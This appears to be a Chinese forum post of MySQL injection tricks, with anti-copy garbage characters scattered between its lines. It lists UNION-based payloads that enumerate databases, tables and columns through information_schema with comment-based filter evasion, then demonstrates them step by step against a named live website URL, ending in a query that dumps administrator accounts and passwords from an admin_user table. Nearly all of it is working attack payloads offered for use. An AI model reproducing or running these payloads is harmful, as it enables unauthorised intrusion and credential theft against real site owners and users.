mysql注入技巧

admin

查库
! x. V! U+ U5 X' q  u4 s" h% h
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

8 ^3 E" J6 C; |% i8 C2 B9 m查表
* m5 l8 U# p1 S, ^8 x
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
) L3 K" S- Z: c# x. [5 A6 F
7 h& C. S7 `( j4 E- M查段
' ?: ~( p; j2 \, b, g
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
' L7 Y0 I& R0 k* c2 ?
  x' {/ I" @" z  `4 {* \* N
( t/ D2 }1 e7 o8 l- T7 c; Z% Qmysql5高级注入方法暴表

6 a6 m  R0 T, `6 ]9 J* C6 }) [例子如下:
1 x' e0 x& P( ?& ]. y* M
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。

2.暴字段
  u& C+ A- Y& T4 }9 ]/ Shttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
* r  ^8 U* }4 U# V4 y3 f, H- V3 V

  ?* w9 a! o' u5 Z0 @3.爆密码
* j4 m6 ?0 `( q/ \) chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
$ m% e% M" c' ^+ S2 B